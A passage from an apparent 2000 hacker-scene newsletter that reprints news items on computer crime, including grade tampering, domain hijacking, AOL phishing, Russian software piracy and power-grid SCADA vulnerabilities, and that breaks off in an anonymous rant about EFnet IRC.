      District technology coordinator Bob England said Thursday. "Altering 
      grades. I believe the police are dealing with it."

      England said the hacker used the district network and software, somehow 
      copied teachers' passwords and logged onto the system.

      Highland Principal Jeff Taylor said disciplinary action would be taken
      and that administrators were "treating it as a serious action against 
      school policy."
      
      
      @HWA

      
 234.0 [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by David 
      Australian Federal Police have identified who they say is the person
      who stole confidential details of thousands of businesses from a
      government GST website. Several Australian businesses reported getting
      strange anonymous emails that contained business phone and fax numbers
      as well as bank account details. The site was set up to allow
      companies to submit their banking details and other information to
      become accredited suppliers of GST information and assistance
      packages. The perpetrator told a reporter that he didn't hack or crack
      into the server, he stumbled upon the information while surfing due to
      a complete lack of security. He thought he should tell the companies
      involved which is why he sent the email. The security hole has been
      blamed on a poorly designed CGI script.
      
      The Age
      news.com.au
      ZD Net Australian
      Fairfax IT
      Sydney Morning Herald
      
      http://www.theage.com.au/breaking/0006/29/A40793-2000Jun29.shtml
      http://www.news.com.au/common/story_page/0,4057,871934%255E2,00.html
      http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html
      http://www.it.fairfax.com.au/breaking/20000629/A40837-2000Jun29.html
      http://www.smh.com.au/news/0006/29/update/news11.html
      @HWA
      
 235.0 [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
      In response to the Federal Communications Commission's inquiry on
      instant messaging, AOL said it supports the interoperability of
      instant messaging (IM) software but that it must make the privacy and
      security of instant messages the company's top priority until
      standards can be developed.
      
      Reuters - via Yahoo
      
      http://dailynews.yahoo.com/h/nm/20000627/en/online-messaging_1.html
      @HWA
      
 236.0 [HNN] Jun 29'00 McCain Still Pushing for Filtering 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
      The Arizona Republican Senator John McCain is still pushing for
      content filtering at the nation's public libraries. He has added an
      amendment onto the Labor appropriations bill that requires schools and
      libraries receiving E-rate funding to use filters to block Internet
      content that is "inappropriate for minors."
      
      Wired
      Summary & Status of S. 3635
      
      http://www.wired.com/news/politics/0,1283,37259,00.html
      http://thomas.loc.gov/cgi-bin/bdquery/z?d106:SP03635:
      @HWA
      
 237.0 [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Weld Pond 
      When Nike's website was redirected by attackers last week it routed
      the traffic through a small web hosting company. That company is now
      suing Nike claiming they were negligent in securing their systems.
      Nike says that if anyone is to blame it is Network Solutions who
      allowed the redirection to occur in the first place. The perpetrator
      of the redirection remains unidentified. (Regardless of how this case
      is decided it will set an interesting precedent either way.)
      
      Wired
      
      http://www.wired.com/news/politics/0,1283,37286,00.html
      @HWA
      
 238.0 [HNN] Jun 29'00 eCrime Documentary 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
      The story of Tim Lloyd, accused and convicted of deleting files and
      thereby destroying the business of his employer is laid out in a blow
      by blow fashion in the article. We have reported on Lloyd before and
      described how he has been found guilty of industrial sabotage of Omega
      Engineering Corp. Now there is a step by step account of how the
      Secret Service got their man.
      
      CNN
      
      http://www.cnn.com/2000/TECH/computing/06/27/omega.files.idg/index.html
      @HWA
      
 239.0 [HNN] Jun 29'00 E-mail Used As Evidence In Korea 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Evil Wench 
      Officials at the Seoul District Prosecutor's Office said they arrested
      32-year-old Kim Sang-hoon, a computer software developer, on charges
      of violating a law governing information-telecommunications networks.
      Kim allegedly stole some 4,600 files from a Web-hosting firm's server.
      One of the witnesses in the case was allowed to send his testimony to
      the court via email.
      
      Korea Herald
      
      http://www.koreaherald.co.kr/news/2000/06/__02/20000629_0213.htm
      @HWA

 240.0 [HNN] Jun 30'00 AOL Users Subjected to Social Engineering 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by William Knowles
      Two 15-year-olds in Wichita, Kansas allegedly tricked some AOL users
      into revealing credit card numbers. Victims received an e-mail from
      "Steve Case" of the "AOL Billing Team" requesting that they go to a
      web site to update their user information. The requested information
      included providing a credit card number "that has not been used for
      any AOL services," the message read. Steve Case, of course, is not a
      member of any billing teams but rather is AOL's president and CEO. An
      AOL official said that the company never asks for users' passwords or
      credit card numbers.
      
      APB News
      
      http://www.apbnews.com/newscenter/breakingnews/2000/06/29/aolscam0629_01.html
      @HWA
      
 241.0 [HNN] Jun 30'00 ZDNet Launches Echelon Study 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Pyle 
      In a series of articles by Duncan Campbell and other contributors,
      ZDNet is taking a closer look at the Echelon global spying network.
      "Echelon: World Under Watch" is a collection of 16 reports that
      include such topics as proof of Echelon's existence, an explanation of
      how Echelon works, and various attempts by governments to maintain the
      secrecy of the project. Public awareness of such far-reaching
      government snooping capabilities could lead to further efforts by
      citizens to protect their privacy.
      
      ZDNet
      
      http://www.zdnet.co.uk/news/specials/2000/06/echelon/
      @HWA
      
 242.0 [HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Weld Pond 
      U.S. venture consulting firm Atomic Tangerine has established a
      cooperative agreement with Interpol to exchange intelligence on
      cybercrime. Atomic Tangerine proposes to pass along Interpol's
      intelligence to any bona fide company free of charge. In exchange,
      Interpol will have access to information gathered by Atomic
      Tangerine's "Net Radar."
      
      Reuters - via Excite
      
      http://news.excite.com/news/r/000629/15/net-security-dc
      @HWA
      
 243.0 [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by Apocalypse Dow
      Consumers and professionals alike are plenty concerned about being
      victimized by cybercrime, but only a fraction of them use firewalls on
      their personal computers. Many people surveyed update their antivirus
      software at least once per month but generally fail to take further
      precautions. (Why not install a firewall or learn about security
      before starting a business?)
      
      Newsbytes.com
      
      http://www.newsbytes.com/pubNews/00/151446.html
      @HWA
      
 244.0 [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by William Knowles
      A former computer science student at Northeastern University admitted
      to computer break-ins at the Defense Logistics Agency, NASA, and the
      Interior Department among others. The federal prosecutor in the case
      sought a harsh penalty as discouragement to other such crimes, but
      under a plea agreement the man will serve a maximum of six months.
      
      AP - via Techserver
      
      http://www.techserver.com/noframes/story/0,2294,500222509-500318460-501790855-0,00.html
      @HWA
      
 245.0 [HNN] Jun 30'00 Threat From Russia? 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Pyle 
      A Thursday New York Times article describes the bleak employment scene
      in Russia as a perfect breeding ground for cyber-criminals. In a
      profile of one bored Russian teenager, "Dr. Linux," the article
      describes instances of internet petty crime as part of a growing
      trend among Russians with an interest in computers and a lot of
      free time. Numerous Russians interviewed claimed that the media have
      exaggerated the importance of recent Russian attacks as part of a
      "cold war mentality."
      
      New York Times - registration required (free)
      
      http://www10.nytimes.com/library/tech/00/06/circuits/articles/29hack.html
      @HWA
      
 246.0 [HNN] Jun 30'00 Zines Update 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      b0g issue 6 just released!

      NOV - Issue 9 is out now and still going strong.
      
      b0g
      
      http://www.b0g.org/
      @HWA

         
      

      
 247.0 [IND] May 26th: Lights Out
       ~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      May 26 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_052600a_j.shtml     
           
      
      5/26/00
      Lights Out
      
      A year in the making, NIPC's Michael Vatis unveils a plan to monitor cyber
      attacks on the power grid. Is it enough to prevent a blackout? 
      By Kevin Poulsen
      
      May 25, 2000 11:36 PM PT
      
      The FBI's National Infrastructure Protection Center (NIPC) will be the hub 
      of a nationwide alert network designed to react quickly against cyber 
      attacks targeting the computerized controls of the North American power 
      grid, in a pilot program announced by NIPC chief Michael Vatis to a Senate 
      committee Thursday.

      Vatis unveiled the "Electrical Power Indications and Warning System" in 
      his written testimony to the full Senate Judiciary committee as it 
      conducted a hearing on cybercrime. "Under the pilot program, electric 
      utility companies and other power entities transmit cyber incident reports 
      to the NIPC," Vatis testified. "These reports are analyzed and assessed to 
      determine whether an NIPC warning, alert, or advisory is warranted to the 
      electric utility community."
      
      More>>http://www.securityfocus.com/news/41 
      
      The FBI established the program in concert with the North American 
      Electrical Reliability Council (NERC), a not-for-profit industry group 
      that umbrellas electric utilities in the U.S. and Canada. "We've been 
      working with NIPC over the past year, maybe a little longer, to develop 
      the program," said Eugene F. Gorzelnik, NERC's communications director. 
      Gorzelnik said the program is being tested by one of the nine regional 
      councils that make up NERC, but declined to say which one. "They've been 
      working through some of the bugs, and we've had several utilities around 
      the country volunteer to participate as well," Gorzelnik said.

      NERC formed in the wake of the catastrophic November 9, 1965 blackout that 
      knocked out power to 30 million people in the Northeastern United States 
      and Ontario, Canada for as long as thirteen hours. Runway landing lights 
      went dark, people were trapped in elevators, traffic snarled at busy 
      intersections that were suddenly left without signals. Decades before 
      buzzwords like "critical infrastructure" and "cyberterrorism" would enter 
      the vernacular, President Lyndon Johnson viewed the blackout as a national 
      security matter and set the FBI and the Pentagon to investigate. Utility 
      engineers eventually traced the genesis of the cascading outage to the 
      failure of a single relay in a transmission line.

      'Utility operations personnel interviewed believed that firewalls and 
      dial-back modems were sufficient to protect their systems from 
      intruders.' -- White House report

      Today, the "Great Northeast Blackout" influences the most 
      popular cyberterror fears. The inevitable hacker-induced blackout goes 
      with the hacker-induced 911 outage as a central doctrine for executive, 
      congressional and industry believers who say that cyberterrorism is a 
      serious and immediate threat to the Western World. National Security 
      Council Terrorism Coordinator Richard Clarke put it this way to the New 
      York Times: "You black out a city, people die. Black out lots of cities, 
      lots of people die. It's as bad as being attacked by bombs." 

      Actual incidents of computer-based attacks against the power grid are hard 
      to find. While the past two decades have seen no shortage of attacks on 
      critical infrastructures -- including a hacker taking over an HBO 
      broadcast through a communications satellite, a group trespassing into the 
      computers controlling a Time Warner cable system, and intruders of all 
      types routinely gaining influence over huge swaths of the telephone 
      network -- tales of intrusions into electric utilities remain apocryphal. 
      An October Wall Street Journal report on the 1995 Dallas "Phone Masters" 
      case included a casual paragraph-eight disclosure that the three hackers 
      involved "had access to portions of the national power grid," but no such 
      charges were filed against the defendants, who admitted to cracking 
      telephone company computers, and the prosecutor on the case denies it. "I 
      don't remember any example of them accessing the power grid," said former 
      Assistant U.S. Attorney Matt Yarbrough, now with a Dallas law firm.

      The electric industry is close-mouthed on the question. "When it comes to 
      saying something specific about whether anything has happened on the 
      electric system, I don't answer," said Gorzelnik. Asked to what degree the 
      power grid is vulnerable to such an assault, Gorzelnik said, "I just won't 
      answer that question. It's not something that we want to talk about in the 
      press. It doesn't serve any useful purpose."

      But a detailed 1997 report by the White House's National Security 
      Telecommunications Advisory Committee paints a sobering picture.


      Open Modems  
      
      The committee's Electric Power Risk Assessment was 
      conducted at the request of President Clinton, and involved six months of 
      investigation and interviews with workers at eight utilities and three 
      industry groups, including NERC. While the report concluded that physical 
      destruction of electric facilities was a far greater threat than online 
      attacks, it also described a power grid controlled by Byzantine systems 
      riddled with basic security holes.

      Networks controlling critical portions of the grid were accessible through 
      corporate LANs, the report said. Digital circuit breakers could be 
      remotely tripped by anyone with the right phone number. Fixed passwords 
      for remote vendor access went unchanged for years. Of particular concern 
      to the committee was the widespread use of unsecured supervisory control 
      and data acquisition (SCADA) systems. The SCADA systems consist of central 
      hosts that can monitor and control smaller Remote Terminal Units (RTUs) 
      sprinkled throughout the grid, which in turn control power flow at any 
      given point. Many RTUs in electrical substations were accessible through 
      telephone dial-ups, some of which were protected only with dial-back 
      systems -- modems that call a user back at a pre-programmed number before 
      granting access -- while others lacked even that weak security mechanism 
      and were accessible to anyone who found the telephone number. "An intruder 
      could dial into this port and issue commands to the substation equipment," 
      the report notes.

      "Open sources, including... electric industry publications, regional maps, 
      and the Internet would provide enough information to identify the most 
      heavily loaded transmission lines and most critical substations in the 
      power grid," reads the report. "Relatively simple hacking techniques could 
      then be used to locate dial-in ports to these points and modify settings 
      to trigger an outage."

      Overall, the report found that utility workers "believed that 
      firewalls and dial-back modems were sufficient to protect their systems 
      from intruders, and they were surprised to learn about the experiences of 
      the telecommunications industry with hackers defeating these measures."

      An engineer with a company that manufactures SCADA systems in use at major 
      electric utilities, speaking on condition that neither he nor his company 
      be identified, said that in recent years the government has spurred 
      electric utilities to increased security. But his company's SCADA products 
      still include dial-up support, and the security features are identical to 
      the ones criticized as weak in the 1997 report. "You can have the remote 
      unit call back to verify that the number is correct," he said. "There are 
      security checks in many areas across the system, via protocols, via 
      passwords... So I'd say it's safe. At least, it's not completely open." 

      "Everything you see in computer security is being applied here. There are 
      utilities that deem it necessary and are applying it. Is every utility 
      applying it? No. But at least [the government] is pushing to see that 
      utilities do it," he said.

      NERC's Gorzelnik wouldn't comment on whether the power grid is any more 
      secure now than in 1997. The Electrical Power Indications and Warning 
      System does nothing to prevent attacks, but rather provides a channel for 
      electric utilities to report attacks they detect directly to NIPC. "With 
      the information NIPC receives, they'll be able to see if there's any kind 
      of trend developing, to see if there's a more serious problem," said 
      Gorzelnik. "They wouldn't just be looking at the power sector, but also 
      banking, telecommunications and other infrastructure sectors" for signs of 
      a coordinated attack, Gorzelnik said.

      The program will go nationwide this fall, and in Thursday's testimony 
      Vatis promised the Senate that it will be a model for similar programs to 
      monitor intrusions into other critical infrastructures. "We are currently 
      working with industry on an Indications and Warning model for the 
      telecommunications sector."

      
      @HWA
      
 248.0 [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      May 30 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_053000a_j.shtml     
      
      5/30/00
      Anti-Metallica Hackers Hit DC Metro Web Site
      By Phuong Ly, Washington Post
      WASHINGTON, DC, U.S.A.,
      30 May 2000, 6:14 AM CST
      
      A computer hacker vandalized the DC Metro's Web site for at least five 
      hours Monday by replacing transit information with an X-rated message 
      lashing out at recording artists who have filed lawsuits to stop people 
      from swapping music files over the Internet.

      The attack, the first for Metro, illustrated how vulnerable many public 
      Internet sites have become to being exploited by vandals.

      Murray Jacobson, manager of Metro's information technology division, said 
      that it was unclear how many users saw the obscene message but that the 
      effect on Metro customers probably was minimal because it occurred on a 
      holiday.

      On a typical weekday, Metro's Web site records about 200,000 visits, some 
      from people accessing the site more than once, according to Cheryl 
      Johnson, a Metro spokeswoman. The site includes a ride guide with maps to 
      help people plan their commutes, and it also allows passengers to buy 
      "smart cards" that store up to $200 in parking and fares. Jacobson said 
      there appeared to be no security breach enabling the hacker to obtain 
      credit card numbers.

      "It did not seem like they were out to destroy a computer system," 
      Jacobson said. "They knew what they could get away with quickly."

      Metro transit police and D.C. police will investigate the incident, which 
      also will be reported to the FBI, Jacobson said.

      Like many Web sites, Metro might have been hit simply because the hackers 
      - whether youths fooling around on a home computer or people who wanted to 
      make a political statement - thought the site could be disrupted, said 
      Mark Rasch, a former federal prosecutor and security consultant with 
      Reston-based Global Integrity.

      About 30 to 50 Web sites are hacked each week, he said. "It's just a site 
      of opportunity," Rasch said of the attack on Metro. "Even if you're not 
      doing anything particularly controversial with your Web site, it may be 
      used to make a political statement."

      In February, some of the Web's most prominent sites - including Yahoo, 
      eBay and Amazon.com - were paralyzed. In April, a 15-year-old Canadian 
      computer whiz known online as "Mafiaboy" was the first person charged in 
      those cyber-strikes.

      Metro's hackers identified themselves as "Idk2k," or "immortal daemon 
      killers," and started their message with "welcome to the year of 
      knowledge." They called the practice of vandalizing Web sites "lame" but 
      necessary because musicians were suing Napster, a popular computer program 
      that allows people to download music. The profanity-filled message berated 
      the rapper Dr. Dre and the heavy metal band Metallica, who have sued 
      Napster and have been particularly outspoken against the company.

      Recently, in chat rooms and message boards, hackers have been seething 
      about the lawsuits, Rasch said. But no other attacks concerning Napster 
      have been reported over the weekend, said representatives at the federally 
      funded CERT Coordination Center at Carnegie Mellon University, which 
      monitors hacker attacks and helps develop responses to them.

      Metro officials discovered that their site had been vandalized about 9:30 
      a.m. Monday and called in tech support staff to change passwords and 
      restore the site, Jacobson said.

      By 3 p.m., Metro's site was running properly and the focus turned to 
      finding the culprits and preventing another attack, Jacobson said.

      Yesterday, Jacobson tried to find a silver lining in the attack. "It's 
      kind of good to know these things happen every once in a while," he said. 
      "It educates our internal users because you know people out there are 
      doing malicious attacks. It's never pleasant, but you want to prepare for 
      the future."
      
      Copyright (C) 2000, The Washington Post. Reprinted with permission. 
      
      @HWA
      
  249.0 [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 1 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060100a_j.shtml     
      
      6/01/00
      Hackers Drawn By The Thrills, The Challenge or Just Plain Cash 
      Experts discuss motives behind cybercrimes
      By David McHugh
      Special for USA TODAY
      
      MOSCOW -- Alexei of St. Petersburg cracked his first program when he was 
      12. Frustrated by a game he couldn't win on his parents' computer, which 
      ran on an Intel 8086 microprocessor, he poked around in the game's 
      programming to make it easier.

      Now 20, the technical institute dropout cracks software to order for $50 
      to $200, defeating security measures, so illegal copies will run on 
      additional computers. He charged one businessman $50 to crack a $3,000 
      program for automating embroidering machines.

      His mother, with whom he lives, doesn't approve. ''So we try not to cross 
      paths on this topic,'' he says.

      Alexei, who declined to give his last name, swaps pirated software under 
      his nickname, Spot, on closed Internet sites limited to members of his 
      group, ScUM (''I forget what it stands for.''). He has never met most of 
      the members in person. Cracking presents an intellectual pleasure, he 
      says. ''A sporting interest, I would say.''

      With many companies reluctant to hurt their reputation by reporting 
      security breaches to police, private systems specialists often lead the 
      uphill fight against hackers. One of them is Sergei Gruzdev, general 
      director for Israeli-based Aladdin Software Security's Moscow office.

      Gruzdev, who admits he wrote viruses in his student days, says he's shut 
      down 35 Web sites where hackers were sharing cracked software and hacking 
      tools. Usually, a call to the Internet provider supporting the site does 
      the trick.

      But Gruzdev sicced the police on the United Crackers League, a St. 
      Petersburg-based group that had figured out how to defeat one of Aladdin's 
      security devices. One of its members, Andrei Lishutin, known as Leshy 
      (''Wood devil'' in Russian) was arrested. After that, the group renamed 
      itself United Copyright Protection/Cryptography Labs and says it is now 
      committed to fighting hackers.

      Hackers, Gruzdev says, ''have the attitude (that) 'I don't want to pay $50 
      to Bill Gates or to Western bourgeois software developers.' It's the 
      psychology of poor people.''

      Some hackers use their skills to make money legally. Aladdin special 
      projects manager Alexei Raevsky, 26, started out by cracking a program for 
      fun when he was a freshman at Moscow's Institute of Physics and 
      Engineering. A classmate handed him a software disk protected by a widely 
      used security program, saying ''You're a hacker, hack this.''

      Raevsky, who was writing programs in 10 computer languages by the time he 
      left high school, studied the security measure ''to test my skills. I 
      cracked it, naturally.'' Then he wrote the software maker in Germany, 
      detailing the flaws. The firm responded by giving him contract work and a 
      top-of-the-line laptop computer -- a luxury among Moscow students.

      Now he drives a Volvo and owns his own apartment, an upper-middle-class 
      standard of living. ''We have the American approach -- if you're so smart, 
      where's your money?'' he says. ''Some waste time on breaking up Web sites, 
      and my attitude is, why do that if there's no money in it?'' 
      
      @HWA
      
250.0 [IND] Web Hijackers Pilfer Internet Domain Names
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 1 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060100b_j.shtml     
      
      6/01/00 
      
      Web Hijackers Pilfer Internet Domain Names
      By Ian Karleff
      
      TORONTO (Reuters) - Cyberspace hijackers have stolen the Internet domain 
      name Web.net, a hosting site for 700 charities, from its Canadian owners, 
      exposing yet another of the Internet's security flaws and jeopardizing the 
      Web's most valuable property -- your e-identity.

      ``This looks like international domain name laundering. I think we're 
      going to start seeing more of this,'' said Ken Campbell, president of K.K. 
      Campbell Internet Consulting in Toronto, and the first to discover 
      Web.net's predicament.

      Earlier this week, hijackers forged, or in Web language ''spoofed,'' 
      Web.net's e-mail account, explained Campbell.

      The hijackers also made crucial changes to the database of Network 
      Solutions, where Internet addresses are registered, and changed the 
      official owner of Web.net to Billy Tandoko of Jakarta, Indonesia.

      The hijackers then moved Web.net's registry to a micro-registrar in 
      Toronto and changed the legal owner to Paul Vernon, allegedly of Hong 
      Kong, and rerouted all traffic to reserveme.com.

      Web.net is still not in control of its Web site, although as of Wednesday 
      reserveme.com began redirecting mail and Web site inquiries back to 
      Web.net's servers, said Tonya Hancherow of Web Networks, the legal owner 
      of Web.net.

      The same hijackers made similar changes to the ownership of Bali.com, and 
      Campbell has since uncovered one more case of Web site hijacking, but does 
      not think the third case is linked.

      Hancherow said she can't believe such a breach of security is as easy as 
      spoofing an e-mail account.

      ``No password was provided and Network Solutions processed the change 
      without consent,'' said Hancherow.

      The hijackers' motives are still a mystery.

      ``I think I'm witnessing an Internet version of international money 
      laundering, whereby someone is scooping up domain names worth $100,000 
      each, moves them around so the paper trail is lost, and ends up with 
      substantial assets,'' said Campbell.

      Hancherow first thought the hijacker was going to try to extort money from 
      Web Networks, but their non-profit status could complicate such a demand.

      ``The other two options: Is he trying to steal it so he can resell it, or 
      is he just trying to play games to make our lives a bit more difficult?'' 
      said Hancherow.

      Brian O'Shaughnessy, a spokesman for Network Solutions, told Reuters this 
      type of hijacking has happened at least a dozen times in the past year and 
      Web Networks is a victim of the excessive volume his company is 
      experiencing from people registering domain names.

      ``A new dot-com is added every 5 seconds. Domain names are a valuable 
      piece of property and that's what people are looking for: a valuable 
      identity on the Internet,'' said O'Shaughnessy.

      ``The rightful owner still has the domain. An unlawful act has been 
      committed using a hole in the system,'' he added.

      With the introduction of competition to the domain name registry field in 
      June 1999, a complex layer has been added to the system, making hijacking 
      easier, said O'Shaughnessy.

      Nevertheless, Campbell believes those businesses that have suffered 
      substantial losses due to hijacking may want to take Network Solutions to 
      court.

      Campbell warned that there was no longer a central administrator guarding 
      the Internet's security, as there was before 1993, when the Clinton 
      administration transformed the Internet from academic tool to commercial 
      medium.

      ``They took away those kind of feudal lords and brought in the naked 
      system that is not very secure,'' said Campbell. ``The Internet was based 
      on a co-operative environment, not a fiercely competitive capitalistic 
      environment, and that's why these problems perennially show up.'' 

      @HWA
      
251.0 [IND] High-Tech Crooks Thrive in Russia
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060100c_j.shtml     
      
      6/02/00
      High-Tech Crooks Thrive in Russia
      By David McHugh, Special for USA TODAY 06/01/00
      
      MOSCOW - The open-air Gorbushka market is the Alice's Restaurant of 
      software. You can get anything you want.

      Laid out on tables under the trees of a Moscow park - as if at a huge yard 
      sale - are row upon row of compact discs. The discs are crammed with 
      pirated versions of expensive programs worth hundreds or thousands of 
      dollars. Vendors offer everything from Microsoft's Windows 98 operating 
      system to computer-assisted-design and voice-recognition software.

      Here, though, they're on sale for 75 rubles, or about $2.75, a disc. It's 
      all illegal, but who's noticing?

      Russia's anarchic computer culture is fertile ground for hacking, piracy, 
      credit-card fraud and other digital crime. Gorbushka, with its vendors 
      hustling at makeshift tables, is just one of the more obvious examples.

      Russia has only about 1.5 million Internet users, a small number when 
      compared with the estimated 110 million in the USA. But among them are 
      some of the world's busiest digital vandals, pirates, thieves and spies. 
      Their victims include the wealthy and powerful: Microsoft, whose software 
      is widely pirated here, America Online, the Pentagon, Citibank.

      Police say the number of computer-related crimes continues to rise in 
      Russia. More than 200 cases were reported in the first three months of 
      this year - more than in all of 1999.

      Typical computer crimes include stealing credit card numbers sent to 
      online businesses, software piracy, stealing passwords to get free time 
      online and theft of business information. 

      Some examples:
      
      
      Police arrested five suspected hackers accused of stealing credit-card 
      numbers from Internet retailers and pocketing more than $630,000, the 
      ITAR-Tass news agency reported last month. The group, which operated from 
      December to April, stole numbers from more than 5,400 cards belonging 
      mostly to foreigners, police said.

      
      Working with an insider, hackers bypassed the security system of the huge 
      natural gas monopoly Gazprom last year and temporarily seized control of 
      the system that regulates gas flows in pipelines, according to the 
      Interior Ministry. Officials did not say whether the break-in caused any 
      damage.

      
      A Russian hacker going by the name Maxus distributed more than 25,000 
      credit-card numbers stolen from an online store, CDUniverse.com. Most of 
      the records were from accounts in the USA, where 65% of the company's 
      customers live. Maxus tried to extort money from the company in January; 
      he sent an e-mail in which he said he had breached the security of a 
      popular credit-card processing program and stole 300,000 customer records. 
      As far as the company knows, he was never caught. 

      
      Hundreds of PIN codes giving access to credit- and debit-card accounts 
      apparently were stolen in mid-1999 after a security breach at a Moscow 
      card-processing center. Cardholders often had their checking accounts 
      cleaned out in an unusual example of bulk PIN theft.

      
      America Online and Compuserve shut down local Internet access numbers in 
      Moscow in 1997 because of what the company called "intolerable levels of 
      fraud." 

      
      In one of the world's first online theft cases to be prosecuted, Vladimir 
      Levin of St. Petersburg was sentenced to three years in a U.S. prison for 
      stealing $3.7 million from Citibank accounts in 1995 using a personal 
      computer. He was arrested in Britain and extradited to the USA.

      
      Hackers apparently working from Russia rummaged in Department of Defense 
      computers for more than a year and stole reams of information. No 
      top-secret material was stolen, the Pentagon says. Computers at NASA and 
      Energy Department nuclear weapons labs also were raided. Investigators 
      don't know who was behind the attack, but some say they suspect Russian 
      intelligence services. Russia's Foreign Intelligence Service has denied 
      it. The agency says it would be too obvious to hack from inside Russia.

      Why does so much mischief emanate from Russia? The hacker problem begins 
      in school, where hacking habits are rife, Russian computer professionals 
      say. 

      During Soviet times, the government and universities actually encouraged 
      people to copy Western software.

      Sometimes lacking the printed data that come with store-bought software, 
      people began taking programs apart to see how they worked. "People had to 
      hack programs to learn them and adapt them to Soviet technical 
      conditions," says Mikhail Salnikov, head of Compulog computer consultants 
      and a veteran of the early days of personal computers in Russia.

      The Soviet government, by copying Western computer technology rather than 
      developing its own versions, was the first hacker, Salnikov says. Combine 
      that with Russia's high level of technical education and the result is a 
      culture in which many people think copying software is no big deal. Those 
      people also have the skills to steal passwords or defeat software security 
      features designed to thwart copying.

      Maj. Dmitry Chepchugov, head of the Interior Ministry's elite 
      anti-computer crime unit, says poverty plays a role, especially in 
      password theft. "We have many people who need the Internet but don't have 
      the money," he says. So they piggyback on someone else's access.

      Otherwise honest people, he says, see nothing wrong in illegal copies, 
      especially when a legal copy can cost a month's wages. "It's only in the 
      past four years that people have begun to see the theft of intellectual 
      property as the same as the theft of real property," he says. "It's an 
      intellectual - and a generational - problem."

      In hopes of wresting some of the bigger customers away from the Gorbushka, 
      manufacturers conduct aggressive education campaigns about software 
      compliance in Russia's corporate sector. However, education among Russian 
      software users might not be enough to stop the threat Russian software 
      thieves present.

      Macromedia, a San Francisco-based company that produces Web-design 
      software, is not a major player in the Russian market. Still, it can't 
      afford to ignore piracy here. Steve Wozniak, director of the company's 
      anti-piracy programs, says Macromedia software has been sold over the 
      Internet from Russia to customers in the West. Russians also have set up 
      Web sites that give away "cracks" for Macromedia software - essentially 
      providing the intellectual tools for would-be pirates.

      Russia rivals China for world leadership in software piracy; about 92% of 
      business software running on Russian machines is estimated to be bootleg, 
      according to the Business Software Alliance, a U.S.-based industry group. 
      Recent estimates put the value of the stolen software at $273 million.

      That's not to say corporations aren't making any money in Russia. "By 
      selling only to 8% of potential customers, Microsoft-Russia sales are 
      about $25 million," says Eugene Danilov, Microsoft-Russia's marketing 
      manager. "Imagine what additional revenue could be generated if piracy was 
      reduced to 80%, 70%."
      
      Contributing: Sarah Karush 
      
      http://www.usatoday.com/life/cyber/tech/cti004.htm 
      
      06/01/00- Updated 11:15 AM ET
       
      
       High-tech crooks thrive in Russia
      By David McHugh, Special for USA TODAY
      
       
      
      
      @HWA
      
      
252.0 [TXT] Treatise: "Why EFnet Sucks." by: Anonymous Whiner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Date unknown: sourced from Mixter's archives

      http://mixter.warrior2k.com.
      
      Brief history, prologue:
      
      EFnet is "Eris Free" net. In a nutshell a rogue system on a young
      IRC (Internet Relay Chat) network constantly caused problems for
      the other systems and anarchy in their midst, consequently they
      were de-linked (removed from network access) and banished to go
      form their own network.
      
      The offending system named "Eris" was now absent and it was 
      conceded to call the new net "Eris Free" as they were now rid
      of the offending machine.
      
      Brief rant by the Editor follows:      
      
      
      IRC basically came to life in 1989 with the coding of ircd so no more
      talkd hacks were needed for meetings, personally I believe EFnet is 
      the place to be, but then I grew up here. It was the new frontier you
      posted your claim stakes then fought to keep your territories. It's a 
      little different in the methodology today but the psychology and 
      dynamics are essentially the same. 
      
      I refuse to give up on a good system simply because some strong
